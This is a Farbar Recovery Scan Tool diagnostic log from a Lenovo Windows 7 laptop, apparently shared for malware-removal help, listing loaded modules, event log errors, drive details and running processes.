2012-12-28 03:33 - 2012-12-28 03:33 - 00094240 _____ () C:\Program Files (x86)\Trend Micro\Client Server Security Agent\zlibwapi.dll
2013-03-25 11:14 - 2013-10-23 04:59 - 00571928 _____ () C:\Program Files (x86)\Trend Micro\BM\TMBMSRV.exe
2013-09-05 03:17 - 2013-09-05 03:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 18:23 - 2010-10-20 18:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2011-10-04 14:58 - 2011-10-04 06:04 - 00045568 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2011-10-04 14:54 - 2010-10-26 16:40 - 00049056 ____N () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
2011-10-04 14:57 - 2011-03-10 22:10 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2009-05-28 00:09 - 2009-05-28 00:09 - 00049976 _____ () C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe
2008-03-11 15:13 - 2008-03-11 15:13 - 00788332 _____ () C:\Program Files (x86)\Digsby\lib\aspell\bin\aspell.exe
2014-01-20 16:17 - 2014-01-20 16:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 16:16 - 2014-01-20 16:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2011-10-04 14:58 - 2010-04-06 11:05 - 02085888 _____ () C:\Program Files\Lenovo\AutoLock\cv210.dll
2011-10-04 14:58 - 2010-04-06 11:04 - 02201088 _____ () C:\Program Files\Lenovo\AutoLock\cxcore210.dll
2013-09-14 03:51 - 2013-09-14 03:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Internet Services\zlib1.dll
2013-09-14 03:50 - 2013-09-14 03:50 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Internet Services\libxml2.dll
2013-09-05 03:14 - 2013-09-05 03:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 18:45 - 2010-10-20 18:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2014-10-28 19:13 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll
2014-10-28 19:13 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll
2014-10-28 19:13 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll
2014-10-28 19:13 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
2014-11-14 11:02 - 2014-11-14 11:02 - 00098816 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32api.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00110080 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\pywintypes27.dll
2014-11-14 11:02 - 2014-11-14 11:02 - 00364544 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\pythoncom27.dll
2014-11-14 11:02 - 2014-11-14 11:02 - 00045568 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_socket.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 01160704 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_ssl.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00320512 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32com.shell.shell.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00713216 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_hashlib.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 01175040 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._core_.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00805888 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._gdi_.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00811008 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._windows_.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 01062400 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._controls_.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00735232 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._misc_.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00128512 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_elementtree.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00127488 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\pyexpat.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00557056 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\pysqlite2._sqlite.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00087552 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_ctypes.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00119808 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32file.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00108544 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32security.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00007168 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\hashobjs_ext.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00167936 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32gui.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00018432 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32event.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00038912 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32inet.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00011264 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32crypt.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00070656 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._html2.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00027136 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_multiprocessing.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00035840 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32process.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00686080 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\unicodedata.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00122368 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._wizard.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00024064 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32pipe.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00025600 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32pdh.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00525640 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\windows._lib_cacheinvalidation.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00010240 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\select.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00017408 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32profile.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00022528 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32ts.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00078336 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._animate.pyd
2010-12-13 11:47 - 2010-12-13 11:47 - 02837504 _____ () C:\Program Files (x86)\Digsby\lib\PYTHON26.DLL
2009-05-13 18:14 - 2009-05-13 18:14 - 00043008 _____ () C:\Program Files (x86)\Digsby\lib\_socket.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00023040 _____ () C:\Program Files (x86)\Digsby\lib\_ssl.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00087040 _____ () C:\Program Files (x86)\Digsby\lib\_ctypes.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00011776 _____ () C:\Program Files (x86)\Digsby\lib\_hashlib.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00010240 _____ () C:\Program Files (x86)\Digsby\lib\select.pyd
2011-01-13 15:56 - 2011-01-13 15:56 - 00053248 _____ () C:\Program Files (x86)\Digsby\lib\sip.pyd
2010-10-21 15:55 - 2010-10-21 15:55 - 01238528 _____ () C:\Program Files (x86)\Digsby\lib\wx._wxcore.pyd
2011-02-09 13:32 - 2011-02-09 13:32 - 00381440 _____ () C:\Program Files (x86)\Digsby\lib\cgui.pyd
2011-01-10 12:59 - 2011-01-10 12:59 - 00076800 _____ () C:\Program Files (x86)\Digsby\lib\wx._webview.pyd
2011-01-10 15:52 - 2011-01-10 15:52 - 06912000 _____ () C:\Program Files (x86)\Digsby\lib\wxwebkit.dll
2009-07-13 18:03 - 2009-07-13 18:03 - 00064512 _____ () C:\Program Files (x86)\Digsby\lib\zlib1.dll
2010-06-03 10:33 - 2010-06-03 10:33 - 01236480 _____ () C:\Program Files (x86)\Digsby\lib\libxml2.dll
2009-03-17 19:21 - 2009-03-17 19:21 - 01346590 _____ () C:\Program Files (x86)\Digsby\lib\iconv.dll
2009-03-17 19:21 - 2009-03-17 19:21 - 00379090 _____ () C:\Program Files (x86)\Digsby\lib\sqlite3.dll
2009-03-17 19:21 - 2009-03-17 19:21 - 00078336 _____ () C:\Program Files (x86)\Digsby\lib\_syck.pyd
2009-03-23 16:11 - 2009-03-23 16:11 - 00026112 _____ () C:\Program Files (x86)\Digsby\lib\_jsonspeedups.pyd
2009-03-17 19:51 - 2009-03-17 19:51 - 00353280 _____ () C:\Program Files (x86)\Digsby\lib\PIL._imaging.pyd
2009-03-23 16:11 - 2009-03-23 16:11 - 00027648 _____ () C:\Program Files (x86)\Digsby\lib\_speedups.pyd
2009-03-17 19:51 - 2009-03-17 19:51 - 00014336 _____ () C:\Program Files (x86)\Digsby\lib\PIL._imagingmath.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00026624 _____ () C:\Program Files (x86)\Digsby\lib\_multiprocessing.pyd
2009-06-15 18:37 - 2009-06-15 18:37 - 00216064 _____ () C:\Program Files (x86)\Digsby\lib\lxml.objectify.pyd
2009-06-15 18:37 - 2009-06-15 18:37 - 00865280 _____ () C:\Program Files (x86)\Digsby\lib\lxml.etree.pyd
2009-06-15 18:37 - 2009-06-15 18:37 - 00213504 _____ () C:\Program Files (x86)\Digsby\lib\libxslt.dll
2009-06-15 18:37 - 2009-06-15 18:37 - 00069632 _____ () C:\Program Files (x86)\Digsby\lib\libexslt.dll
2009-03-24 15:49 - 2009-03-24 15:49 - 00249344 _____ () C:\Program Files (x86)\Digsby\lib\M2Crypto.__m2crypto.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00127488 _____ () C:\Program Files (x86)\Digsby\lib\pyexpat.pyd
2010-06-03 10:33 - 2010-06-03 10:33 - 00218112 _____ () C:\Program Files (x86)\Digsby\lib\libxmlmods.libxml2mod.pyd
2010-06-03 10:33 - 2010-06-03 10:33 - 00011776 _____ () C:\Program Files (x86)\Digsby\lib\_xmlextra.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00583168 _____ () C:\Program Files (x86)\Digsby\lib\unicodedata.pyd
2010-03-05 16:16 - 2010-03-05 16:16 - 00044544 _____ () C:\Program Files (x86)\Digsby\lib\_sqlite3.pyd
2010-10-13 17:11 - 2010-10-13 17:11 - 00230400 _____ () C:\Program Files (x86)\Digsby\lib\wx._wxstc.pyd
2010-12-02 15:47 - 2010-12-02 15:47 - 00153088 _____ () C:\Program Files (x86)\Digsby\lib\blist.pyd
2010-10-28 16:52 - 2010-10-28 16:52 - 00462336 _____ () C:\Program Files (x86)\Digsby\lib\buddylist.dll
2009-05-13 18:14 - 2009-05-13 18:14 - 00069120 _____ () C:\Program Files (x86)\Digsby\lib\bz2.pyd
2009-03-17 19:51 - 2009-03-17 19:51 - 00350208 _____ () C:\Program Files (x86)\Digsby\lib\PIL._imagingft.pyd
2008-03-11 15:13 - 2008-03-11 15:13 - 01364823 _____ () C:\Program Files (x86)\Digsby\lib\aspell\bin\aspell-15.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:0574215C
AlternateDataStreams: C:\ProgramData\TEMP:D95ACC7D
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (1).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (2).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (3).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (4).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (5).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (6).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (7).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname.eml:OECustomProperty
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-3229223266-3186577701-243259943-500 - Administrator - Disabled)
Guest (S-1-5-21-3229223266-3186577701-243259943-501 - Limited - Disabled)
 
==================== Faulty Device Manager Devices =============
 
Name: Officejet Pro 8500 A909g
Description: Officejet Pro 8500 A909g
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Cisco AnyConnect VPN Virtual Miniport Adapter for Windows x64
Description: Cisco AnyConnect VPN Virtual Miniport Adapter for Windows x64
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: vpnva
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Officejet Pro 8500 A909g
Description: Officejet Pro 8500 A909g
Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Manufacturer: HP
Service: StillCam
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/14/2014 11:01:31 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/14/2014 07:59:08 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/14/2014 07:35:54 AM) (Source: VSS) (EventID: 12294) (User: )
Description: Volume Shadow Copy Service error: Error calling a routine on the Shadow Copy Provider {b5946137-7b9f-4925-af80-51abd60b20d5}. Routine returned E_INVALIDARG.
Routine details GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0).
 
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:54 AM) (Source: VSS) (EventID: 12294) (User: )
Description: Volume Shadow Copy Service error: Error calling a routine on the Shadow Copy Provider {b5946137-7b9f-4925-af80-51abd60b20d5}. Routine returned E_INVALIDARG.
Routine details GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0).
 
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:53 AM) (Source: VSS) (EventID: 12294) (User: )
Description: Volume Shadow Copy Service error: Error calling a routine on the Shadow Copy Provider {b5946137-7b9f-4925-af80-51abd60b20d5}. Routine returned E_INVALIDARG.
Routine details GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0).
 
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 40467955
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 40467955
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (11/13/2014 09:40:22 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/12/2014 06:23:18 PM) (Source: SideBySide) (EventID: 63) (User: )
Description: Activation context generation failed for "assemblyIdentity1".Error in manifest or policy file "assemblyIdentity2" on line assemblyIdentity3.
The value "6.0.0.6u9b41" of attribute "version" in element "assemblyIdentity" is invalid.
 
 
System errors:
=============
Error: (11/14/2014 00:42:31 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The Meraki VNC Server service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (11/14/2014 11:03:19 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/14/2014 11:02:25 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: CORP)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
 
Error: (11/14/2014 11:01:58 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10000) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has failed to start.
 
Module Path: C:\Windows\System32\IWMSSvc.dll
Error Code: 258
 
Error: (11/14/2014 11:01:29 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
 
Error: (11/14/2014 11:00:58 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain CORP due to the following: 
%%1311
 
This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.
 
 
 
ADDITIONAL INFO
 
If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.
 
Error: (11/14/2014 09:01:43 AM) (Source: volsnap) (EventID: 36) (User: )
Description: The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.
 
Error: (11/14/2014 07:59:35 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10000) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has failed to start.
 
Module Path: C:\Windows\System32\IWMSSvc.dll
Error Code: 258
 
Error: (11/14/2014 07:59:11 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: CORP)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
 
Error: (11/14/2014 07:59:06 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
 
 
Microsoft Office Sessions:
=========================
Error: (11/14/2014 11:01:31 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/14/2014 07:59:08 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/14/2014 07:35:54 AM) (Source: VSS) (EventID: 12294) (User: )
Description: {b5946137-7b9f-4925-af80-51abd60b20d5}GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0)
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:54 AM) (Source: VSS) (EventID: 12294) (User: )
Description: {b5946137-7b9f-4925-af80-51abd60b20d5}GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0)
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:53 AM) (Source: VSS) (EventID: 12294) (User: )
Description: {b5946137-7b9f-4925-af80-51abd60b20d5}GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0)
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 40467955
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 40467955
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (11/13/2014 09:40:22 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/12/2014 06:23:18 PM) (Source: SideBySide) (EventID: 63) (User: )
Description: assemblyIdentityversion6.0.0.6u9b41C:\Program Files\Tivoli\TSM\baclient\jvm60\jre\bin\unpack200.exeC:\Program Files\Tivoli\TSM\baclient\jvm60\jre\bin\unpack200.exe19
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-2540M CPU @ 2.60GHz
Percentage of memory in use: 58%
Total physical RAM: 3978.23 MB
Available physical RAM: 1634.13 MB
Total Pagefile: 7954.65 MB
Available Pagefile: 4206.63 MB
Total Virtual: 8192 MB
Available Virtual: 8191.81 MB
 
==================== Drives ================================
 
Drive c: (Windows7_OS) (Fixed) (Total:102.44 GB) (Free:6.41 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: (My Passport) (Fixed) (Total:931.48 GB) (Free:906.58 GB) NTFS
Drive q: (Lenovo_Recovery) (Fixed) (Total:15.62 GB) (Free:6.19 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 119.2 GB) (Disk ID: E4BA5E21)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=102.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=15.6 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: 00023F15)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-11-2014 02
Ran by HStagner (administrator) on HS-T420S on 14-11-2014 12:50:15
Running from C:\Users\hstagner\Downloads\Malware fix (2)
Loaded Profiles: HStagner &  (Available profiles: HStagner)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect VPN Client\vpnagent.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe
(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
(Coupons.com Inc.) C:\Program Files (x86)\Coupons\CouponPrinterService.exe
(CrashPlan) C:\Program Files\CrashPlan\CrashPlanService.exe
(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Juniper Networks) C:\Program Files (x86)\Common Files\Juniper Networks\JUNS\dsAccessService.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe
() C:\Program Files (x86)\Meraki\PCC Agent 1.0.87\m_agent_service.exe
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\Ntrtscan.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Professional 7\PDFProFiltSrv.exe
(Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Conexant Systems, Inc.) C:\Windows\SysWOW64\SASrv.exe
(Birch Grove Software, Inc.) C:\Windows\SysWOW64\svctcom.exe
(IBM Corporation) C:\Program Files\Tivoli\TSM\baclient\dsmcsvc.exe
(Ulead Systems, Inc.) C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\TmListen.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\HostedAgent\HostedAgent.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlk.exe
() C:\Program Files (x86)\Trend Micro\BM\TMBMSRV.exe
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\TmProxy.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\virtscrl.exe
(Birch Grove Software, Inc.) C:\Windows\SysWOW64\scthost.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe
(Birch Grove Software, Inc.) C:\Windows\SysWOW64\trmhost.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SRORest.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Lenovo.) C:\Windows\System32\TpShocks.exe
() C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\AutoLock\ALCKRESI.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Box) C:\Users\hstagner\AppData\Local\Box\Box Edit\Box Edit.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Code 42 Software, Inc.) C:\Program Files\CrashPlan\CrashPlanTray.exe
